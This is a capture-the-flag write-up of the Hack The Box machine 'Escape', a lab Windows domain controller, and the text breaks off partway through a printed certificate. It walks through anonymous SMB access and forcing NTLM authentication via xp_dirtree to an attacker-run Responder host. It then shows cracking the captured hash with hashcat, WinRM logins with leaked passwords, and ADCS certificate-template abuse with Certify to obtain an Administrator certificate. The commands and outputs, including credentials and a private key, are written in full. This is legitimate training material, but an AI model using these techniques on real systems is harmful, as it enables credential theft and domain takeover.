HTB - Escape Write-up

HTB - Escape Write-up

TL;DR

We start off with finding guest user SQL credentials from a PDF document and right off the bat we could able to perform SMB Relay attack and capture Service Account hash. Upon cracking the hash we could able to login into the system via WinRM port. SQL server logs leaks another user's credential and we login with that. There's a misconfigured certificate template (ADCS) for the user, we escalate our privileges to Administrator to successfully root the machine.

Enumeration

🔥\> nmap -p- -sC -sV -v -oA enum --min-rate 3000 --max-rtt-timeout 1300ms 10.129.65.160
Nmap scan report for 10.129.65.160
Host is up (0.19s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-02-28 12:52:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-02-28T12:54:17+00:00; +7h59m58s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Micros oft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-28T12:54:18+00:00; +7h59m58s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-02-28T12:54:17+00:00; +7h59m58s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-28T04:20:45
| Not valid after:  2053-02-28T04:20:45
| MD5:   38cf7d7fd80c5c92ee9e8417f725cc0d
|_SHA-1: eef3b0caa0f4b28534a7f3d84f11eeb400f4f7eb
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-02-28T12:54:17+00:00; +7h59m58s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-02-28T12:54:18+00:00; +7h59m58s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49682/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
50610/tcp open  msrpc         Microsoft Windows RPC
65398/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-02-28T12:53:39
|_  start_date: N/A
|_clock-skew: mean: 7h59m57s, deviation: 0s, median: 7h59m57s

Add DNS to hosts file. SMB is open, let’s try anonymous login.

🔥\> smbclient -L //sequel.htb -U ''
Password for [WORKGROUP\]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Public          Disk
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to sequel.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Anonymous login is enabled. Check ‘Public’ directory.

🔥\> smbclient //sequel.htb/Public -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1469523 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (111.8 KiloBytes/sec) (average 111.8 KiloBytes/sec)

Download the PDF file and check the content.

Image.png

Image.png

We have information about recent incidents on their SQL server, so now they have put a procedure document on how to access the SQL server. This document leaks potential usernames, guest password to access SQL server.

Let’s login SQL server using those credentials.

🔥\> sqsh -S sequel.htb:1433 -P 'GuestUserCantWrite1' -U PublicUser
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'

1> SELECT name FROM master.dbo.sysdatabases

2> go -m pretty
+===========================================================================================================================================================================+
| name                                                                                                                                                                      |
+===========================================================================================================================================================================+
| master                                                                                                                                                                    |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| tempdb                                                                                                                                                                    |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| model                                                                                                                                                                     |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| msdb                                                                                                                                                                      |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

(4 rows affected)

Let’s do some basic enumeration.

1> select @@version;
2> go -m pretty
+===========================================================================================================================================================================+
|                                                                                                                                                                           |
+===========================================================================================================================================================================+
| Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)                                                                                                                       |
|       Sep 24 2019 13:48:23                                                                                                                                                     |
|       Copyright (C) 2019 Microsoft Corporation                                                                                                                                 |
|       Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)                                                                         |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

(1 row affected)
1> select user_name();
2> go -m pretty
+===========================================================================================================================================================================+
|                                                                                                                                                                           |
+===========================================================================================================================================================================+
| guest                                                                                                                                                                     |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

(1 row affected)
1> SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
2> go -m pretty
+==================+==================================+==================================+==================================+==================================+==================================+==================================+============+=============+
| configuration_id | name                             | value                            | minimum                          | maximum                          | value_in_use                     | description                      | is_dynamic | is_advanced |
+==================+==================================+==================================+==================================+==================================+==================================+==================================+============+=============+
|            16390 | xp_cmdshell                      | 0                                | 0                                | 1                                | 0                                | Enable or disable command shell  |          1 |           1 |
+------------------+----------------------------------+----------------------------------+----------------------------------+----------------------------------+----------------------------------+----------------------------------+------------+-------------+

(1 row affected)

1> EXEC SP_CONFIGURE 'show advanced options', 1
2> reconfigure
3> go
Msg 15247, Level 16, State 1
Server 'DC\SQLMOCK', Procedure 'SP_CONFIGURE', Line 105
User does not have permission to perform this action.
(return status = 1)
Msg 5812, Level 14, State 1
Server 'DC\SQLMOCK', Line 2
You do not have permission to run the RECONFIGURE statement.

As this is a guest account xp_cmdshell is disabled and we don't have permission to enable it.

Initial Access

Let’s perform SMB Relay attack using MSSQL. For this we need to setup a smb server, fortunately we have responder which sets up for us.

🔥\> sudo responder -I tun0

Now from SQL shell, we try to connect back to our SMB Server.

1> xp_dirtree '\\10.10.14.28\NTLM'
2> go -m pretty
+=============================================================================================================================================================+=============+
| subdirectory                                                                                                                                                |       depth |
+=============================================================================================================================================================+=============+

(0 rows affected, return status = 0)

Check responder.

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:a61113c68dc12de5:796ACAEACD941F55744425503D9240FF:0101000000000000009483AB084FD90157F9F1A32437083900000000020008004C0050005100380001001E00570049004E002D0035004A0049004C0059004B005A004D0052004B00470004003400570049004E002D0035004A0049004C0059004B005A004D0052004B0047002E004C005000510038002E004C004F00430041004C00030014004C005000510038002E004C004F00430041004C00050014004C005000510038002E004C004F00430041004C0007000800009483AB084FD90106000400020000000800300030000000000000000000000000300000FC84203BB464C463DAB0E93328048CB90E17497A90C9F27DEFB22E1684F581640A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00320038000000000000000000

We got the NTLMv2 (Net-NTLM) hash. We can crack it using HashCat.

Save the hash to a file.

🔥\> cat sql_svc.hash
sql_svc::sequel:50eaf3aecb06d284:ADAA013773730D4EEB29B41CF7E17F34:010100000000000000B50054114BD90155F55F66D4DF7B300000000002000800490047003900490001001E00570049004E002D00350052004F00350050004F0035004700550050004C0004003400570049004E002D00350052004F00350050004F0035004700550050004C002E0049004700390049002E004C004F00430041004C000300140049004700390049002E004C004F00430041004C000500140049004700390049002E004C004F00430041004C000700080000B50054114BD901060004000200000008003000300000000000000000000000003000004FED3AFFEC59C61A7CE2FE60470E4DCB1464B0B6E1F623F6EA271A09A419151C0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E003100340030000000000000000000

Crack the hash.

🔥\> hashcat -m 5600 sql_svc.hash /usr/share/wordlists/rockyou.txt

______________SNIP_________________

SQL_SVC::sequel:50eaf3aecb06d284:adaa013773730d4eeb29b41cf7e17f34:010100000000000000b50054114bd90155f55f66d4df7b300000000002000800490047003900490001001e00570049004e002d00350052004f00350050004f0035004700550050004c0004003400570049004e002d00350052004f00350050004f0035004700550050004c002e0049004700390049002e004c004f00430041004c000300140049004700390049002e004c004f00430041004c000500140049004700390049002e004c004f00430041004c000700080000b50054114bd901060004000200000008003000300000000000000000000000003000004fed3affec59c61a7ce2fe60470e4dcb1464b0b6e1f623f6ea271a09a419151c0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310035002e003100340030000000000000000000:REGGIE1234ronnie

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:50eaf3aecb06d284:adaa013773730d4eeb...000000
Time.Started.....: Sun Mar  5 02:20:53 2023 (10 secs)
Time.Estimated...: Sun Mar  5 02:21:03 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1101.9 kH/s (0.45ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10700800/14344385 (74.60%)
Rejected.........: 0/10700800 (0.00%)
Restore.Point....: 10699776/14344385 (74.59%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: REJONTE -> REDOCEAN22
Hardware.Mon.#1..: Util: 61%

Started: Sun Mar  5 02:20:51 2023
Stopped: Sun Mar  5 02:21:05 2023

We got the password. Let’s login into WINRM.

🔥\> evil-winrm -i sequel.htb -u sql_svc -p 'REGGIE1234ronnie'

Evil-WinRM shell v3.4

*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Privilege Escalation - User

*Evil-WinRM* PS C:\Users\sql_svc\Documents> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Brandon.Brown            Guest
James.Roberts            krbtgt                   Nicole.Thompson
Ryan.Cooper              sql_svc                  Tom.Henn
The command completed with one or more errors.

I ran WinPEAS, it didn’t give any info which can be used to escalate privs, but it shows certificates are being used.

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating machine and user certificate files

  Issuer             : CN=sequel-DC-CA, DC=sequel, DC=htb
  Subject            :
  ValidDate          : 11/18/2022 1:05:34 PM
  ExpiryDate         : 11/18/2023 1:05:34 PM
  HasPrivateKey      : True
  StoreLocation      : LocalMachine
  KeyExportable      : True
  Thumbprint         : B3954D2D39DCEF1A673D6AEB9DE9116891CE57B2

  Template           : Template=Kerberos Authentication(1.3.6.1.4.1.311.21.8.15399414.11998038.16730805.7332313.6448437.247.1.33), Major Version Number=110, Minor Version Number=0
  Enhanced Key Usages
       Client Authentication     [*] Certificate is used for client authentication!
       Server Authentication
       Smart Card Logon
       KDC Authentication
   =================================================================================================

  Issuer             : CN=sequel-DC-CA, DC=sequel, DC=htb
  Subject            : CN=sequel-DC-CA, DC=sequel, DC=htb
  ValidDate          : 11/18/2022 12:58:46 PM
  ExpiryDate         : 11/18/2121 1:08:46 PM
  HasPrivateKey      : True
  StoreLocation      : LocalMachine
  KeyExportable      : True
  Thumbprint         : A263EA89CAFE503BB33513E359747FD262F91A56

   =================================================================================================

  Issuer             : CN=sequel-DC-CA, DC=sequel, DC=htb
  Subject            : CN=dc.sequel.htb
  ValidDate          : 11/18/2022 1:20:35 PM
  ExpiryDate         : 11/18/2023 1:20:35 PM
  HasPrivateKey      : True
  StoreLocation      : LocalMachine
  KeyExportable      : True
  Thumbprint         : 742AB4522191331767395039DB9B3B2E27B6F7FA

  Template           : DomainController
  Enhanced Key Usages
       Client Authentication     [*] Certificate is used for client authentication!
       Server Authentication
   =================================================================================================

Let’s find any vulnerable certificate. Upload Certify.exe binary and find.

*Evil-WinRM* PS C:\Users\sql_svc\Documents> ./certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[+] No Vulnerable Certificates Templates found!

As you can see there are not certificates found for this current user.

Check C drive.

*Evil-WinRM* PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/1/2023   8:15 PM                PerfLogs
d-r---         2/6/2023  12:08 PM                Program Files
d-----       11/19/2022   3:51 AM                Program Files (x86)
d-----       11/19/2022   3:51 AM                Public
d-----         2/1/2023   1:02 PM                SQLServer
d-r---         2/1/2023   1:55 PM                Users
d-----         2/6/2023   7:21 AM                Windows

There’s a SQLServer directory on the main drive. Inside it, you will see a log file.

*Evil-WinRM* PS C:\sqlserver\logs> ls


    Directory: C:\sqlserver\logs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

Read it and look for any info.

*Evil-WinRM* PS C:\sqlserver\logs> type ERRORLOG.BAK

---------------------- SNIP ------------------

2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

There’s a login failure message, it gives us password of Ryan user. The user has mistakenly typed his password as username.

Let’s login as Ryan.

🔥\> evil-winrm -i sequel.htb -u Ryan.Cooper -p 'NuclearMosquito3'

Evil-WinRM shell v3.4

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Privilege Escalation - Admin

When we previously checked by vulnerable certificates there are none for that user. Let’s check now with Ryan user.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthenticationUserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificates-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:10.3621056

As you can see, there’s a vulnerable certificate which can be abused for privilege escalation.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 12

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA6hdad3nUKHjKtiRCsA6c3CgAklVfWo1rlvD0bBYgAHeTMMKP
0sCSPG6fQ4tl7hS/XYZ/4Xe6nISvpzPM6deAC3mFoJIe0wyZ5RVS8ETcrVIDQCam
0+4R4yz88fGa0O2YWp9+ZyGDvnj8nezBT1n3NS0hDZeP1y0U3QqbKxKaAgO68kfs
t/fyZ9vl7kh72xKPec2IAq6i37gxYlJYWp0Bi/r/WoIrfnI6P9V6kXLHTX7F+Ji4
RT0qPYaThfU4bzZlpFyTcHRk2T5A4jTwD3XZ+dt/QNKS8Z03P0s/uqr6hJlc0EqF
qHtOBd0OlxYZN67SGFIBCnKZfZmwe9ogXdFB1QIDAQABAoIBADfZoofm1Stixlp2
hEKk+d+824YOQFXGb+jvTCGNlc0GumNjyBSsRTeN3QmsdIE9CfsyX8hXXHqDXbUy
sq0H8VDLiYop0pjf5Me3MraId24SpxvjHOJrZnEhBqhi0GEQjszwSKQqZthG3V6A
Yg6glE5nmf84LeVUqCmkoijAo2XfMQ7gltYJa67DVlR/rS5Wq8rJUtvZ7n8HJhiY
rwxOx6Hvd4P2nnf/82zY1zs57SdV73lT40qS0QWF/q1WY/IKuFxv3x+vQxABGXj+
J7t+eUUlqFWtwcimsSAmCIfGXEykc67nNvrEHWgeHv70jm/DiIVQrQ4H5lfc/kNe
FzSwdfECgYEA6x8AEJtEFvPgvBTBGDluCZVYFSLM+fA52n52BQTUCT3+dpTtZp1s
HAiuheQhu92Jb1EuTJg+ig20i93aNyVJSozp5fH31h2+fcZ4fXrVxxSnBQyBrRqb
c5vtxIZIxI4lwskL6DfEpmzsYU3oAHE+n8ifUuapDXqjTYJtVmwB2FMCgYEA/uDw
7To7+4pDgwy1iDUQFoklyTyJaBW2ciNXH/mLm1zeDsYBLjWY4+qXErxcPLsGUeKh
B2+YmV7K9CbPmuvGCNVuKoWFOQSmDK9Ke7je3blHYTK1wtQu24+Z2hHjfJO++adz
bzzLekZMtGgZP4o4hoR2llKY0PnvinV0/5nMGDcCgYBKUiZHGY1QZA6p5TWUXrL1
vIt3QuTgLJtdAZR0ya3srff9q93PDfvacLQaBp7TL5f94/9qnsVGBkcH3zzXKaYd
NqXI1c+tkwFf6Ji1sVpZ76FL60QiX8K7rJJgCMJ/vx8Yj0yAPwCeStf9eg7X9PQC
tfwGzHqrlBSCr7O4GbQLmQKBgQCjx+Xpeu9Kbwl877DDCt4ArTajvovJX5Jye7Uj
rdaBCkcDFUdy6ywI4RkdB/75Y3DnM4soXRShEWG3TC1Brtn9mTCGkHAQOKV/JzDk
meJUdhehJNXZkUFfA0Lo92/IAKTKhkjOJTHXq87karQ2uVojToFpjT/3oXPE9D8v
dCPLNwKBgDzILxcM6I7XOTdAxS9WPM6xeweIH3Ju0p0+/+ClxnHUTZf2SmaRq/9n
Weka2UyDIjKJEIzxlFshaBTgaNyNUoWQTV90Hz0KhS54ZM43hDc3Lrnm0s9DzWNx
vhSangGMjSpvTk44PVV3xjrBMbj3WY8oBG3ktIz0t1VEciMwz8Ge
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAy6COU/RrLdKAAAAAAADDANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjMwMzA1MTcwMzA5WhcNMjUwMzA1
MTcxMzA5WjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDqF1p3edQoeMq2JEKwDpzcKACS
VV9ajWuW8PRsFiAAd5Mwwo/SwJI8bp9Di2XuFL9dhn/hd7qchK+nM8zp14ALeYWg
kh7TDJnlFVLwRNytUgNAJqbT7hHjLPzx8ZrQ7Zhan35nIYO+ePyd7MFPWfc1LSEN
l4/XLRTdCpsrEpoCA7ryR+y39/Jn2+XuSHvbEo95zYgCrqLfuDFiUlhanQGL+v9a
git+cjo/1XqRcsdNfsX4mLhFPSo9hpOF9ThvNmWkXJNwdGTZPkDiNPAPddn5239A
0pLxnTc/Sz+6qvqEmVzQSoWoe04F3Q6XFhk3rtIYUgEKcpl9mbB72iBd0UHVAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFIZU3b/gAzyj93inxmAKWB+pMEpQ
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
